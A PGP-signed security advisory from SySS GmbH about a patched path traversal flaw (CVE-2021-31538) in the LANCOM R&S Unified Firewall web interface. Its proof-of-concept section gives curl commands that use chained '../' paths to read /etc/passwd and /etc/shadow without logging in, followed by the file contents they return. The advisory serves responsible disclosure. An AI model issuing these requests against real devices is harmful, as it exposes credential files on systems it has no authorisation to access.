-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-010 Product: LANCOM R&S Unified Firewalls UF-XXX Manufacturer: LANCOM Affected Version(s): LCOS FX 10.5.X Tested Version(s): LCOS FX 10.5.RU3 Vulnerability Type: : Relative Path Traversal (CWE-23) Risk Level: High Solution Status: Patched Manufacturer Notification: 2021-03-17 Solution Date: 2021-05-11 Public Disclosure: 2021-05-25 CVE Reference: CVE-2021-31538 Author of Advisory: Zoellner Matthias, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: LANCOM R&SĀ®Unified Firewalls UF-500 is a firewall and VPN gateway. The manufacturer describes the product as follows (see [1]): "LANCOM R&SĀ®Unified Firewalls offer small and medium-sized enterprises a customized complete solution for state-of-the-art security and Unified Threat Management (UTM)." Due to a path traversal, an unauthenticated attacker can read sensitive files over the web interface by crafted requests. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: As provided user input is not sanitized correctly, it is possible for an unauthenticated attacker to craft requests which read sensitive files. The providing service on the machine is running with high privileges, which allows reading a large number of files, including the /etc/shadow file. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): To reproduce the vulnerability, follow these steps: $> curl -k --path-as-is "https://10.10.10.10/../../../../../../../../../../../../etc/passwd" root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync man:x:6:12:man:/var/cache/man:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh gpserver:x:100:1:gpserver:/opt/gateprotect:/bin/false messagebus:x:101:101:messagebus:/var/run/dbus:/bin/false ntp:x:125:1:ntp:/var/lib/ntp:/bin/false sshd:x:102:65534:sshd:/var/run/sshd:/bin/false postgres:x:103:103:postgres:/var/statistic/data:/bin/false quagga:x:107:107::/etc/quagga:/bin/false nobody:x:65534:65534:nobody:/nonexistent:/bin/sh gpadmin:x:354:100:gateprotect default user:/home/gpadmin:/bin/bash systemd-network:x:999:999:systemd-network:/run/systemd/netif:/bin/false systemd-journal:x:998:998:systemd-journal:/run/log/journal:/bin/false bind:x:997:997:bind:/var/cache/bind:/bin/false haproxy:x:996:996:haproxy:/run/haproxy:/bin/false radvd:x:994:994:radvd:/run/radvd:/bin/false siproxd:x:993:1:siproxd:/var/lib/siproxd:/bin/false ulog:x:992:1:ulogd:/var/tmp:/bin/false hacluster:x:991:991:hacluster:/var/lib/pacemaker:/bin/false redis:x:990:990:redis:/var/lib/redis:/bin/false postfix:x:989:989:postfix:/var/db/postfix:/bin/false tftpd:x:987:987:tftpd:/srv/tftpd:/bin/false avahi:x:1000:1000::/home/avahi: $> curl -k --path-as-is "https://10.10.10.10/../../../../../../../../../../../../etc/shadow" root:*:18560:0:99999:7::: daemon:*:18560:0:99999:7::: bin:*:18560:0:99999:7::: sys:*:18560:0:99999:7::: sync:*:18560:0:99999:7::: man:*:18560:0:99999:7::: mail:*:18560:0:99999:7::: news:*:18560:0:99999:7::: proxy:*:18560:0:99999:7::: www-data:*:18560:0:99999:7::: backup:*:18560:0:99999:7::: gpserver:x:18560:0:99999:7::: messagebus:x:18560:0:99999:7::: ntp:x:18560:0:99999:7::: sshd:x:18560:0:99999:7::: postgres:x:18560:0:99999:7::: quagga:x:18560:0:99999:7::: nobody:*:18560:0:99999:7::: gpadmin:$6$iYGTuHmJ$####REDACTED####:18560:0:99999:7::: systemd-network:x:18560:0:99999:7::: systemd-journal:x:18560:0:99999:7::: bind:x:18560:0:99999:7::: haproxy:x:18560:0:99999:7::: radvd:x:18560:0:99999:7::: siproxd:x:18560:0:99999:7::: ulog:x:18560:0:99999:7::: hacluster:x:18560:0:99999:7::: redis:x:18560:0:99999:7::: postfix:x:18560:0:99999:7::: tftpd:x:18560:0:99999:7::: avahi:!:18700:0:99999:7::: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The vendor released a new version of the LCOS FX firmware, which fixes the behavior. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-03-16: Vulnerability discovered 2021-03-17: Vulnerability reported to manufacturer 2021-03-19: Confirmed by manufacturer 2021-05-11: Fixed version released by manufacturer 2021-05-25: Advisory published by SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Website for LANCOM UF-500 https://www.lancom-systems.com/products/security/unified-firewalls/ [2] Release Notes https://www.lancom-systems.de/download/documentation/Release_Notes_FX/RN_LCOS-FX-106-Rel_DE.pdf [3] SySS Security Advisory SYSS-2021-010 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-010.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Matthias Zoellner of SySS GmbH. E-Mail: matthias.zoellner@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Zoellner.asc Key Fingerprint: 36CD 6245 CBBF DA3C 14B5 5C33 B6E2 E969 CDB2 BC91 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEENs1iRcu/2jwUtVwztuLpac2yvJEFAmCsnZgACgkQtuLpac2y vJFPgQ/9GybosRmOzkXNtjl/BWis6AiASXBIiWJyclu7aOn/iTHhtnpBnxlmK3kB mVHjaZlwGkcvq6OvBnXNy/vTEe1nvhfzw0bqAGuL4cQWv+KhuRHY8FcxY7OIXUEZ UNI3RFXJHIuC4+K8vDg+ordfagJB8mi6XZCUTGfOT7YPzBrSBz4lhIZjYve8WhNb zXp0yy0U2cTpfQHZtlFRHe5/vGMqbZX1z2EZwIr+zewE+11CopztGDLME+YJZtjv W445rpUXORnu+HTwcHjPQSpjeK3HEpEgTc53+JBx1+7BiuXgThHRwF2meND9lx0i n58Jrk/C3jFlRFiAZ337tu6yl6428wLw8KgmjIK+ksbI3Hm1OaQTmN+dGhyG2Fb4 jtWsUnNQwTkyZCRsLRLpN/7bbChRFbUXwebvkEaTmJToVVDAFNtCBtEf/o1mXbmi r+HyXxvyX0sXIh12hhCuOONvTT5u7Vp0Zg1gYG4VZy8diPVKICDiS/JCE7wSB7uD dsGhqzvUloz1E0Mj/3Iewpv1pN5ydhnhbprXBcW5E/NuNKSaOxuzWoscSchimP3g e6QLjy9ShjPqk96oN9WecdXJv0hhJ+R5OM+8ni9LoU1/LQsTPbBgeBUDNkV4HJP+ 7D5ae0eHpnGcE6+DzYihX9LhAHDkqQpNnuVL2S/lrW6agy+mfEA= =QAR3 -----END PGP SIGNATURE-----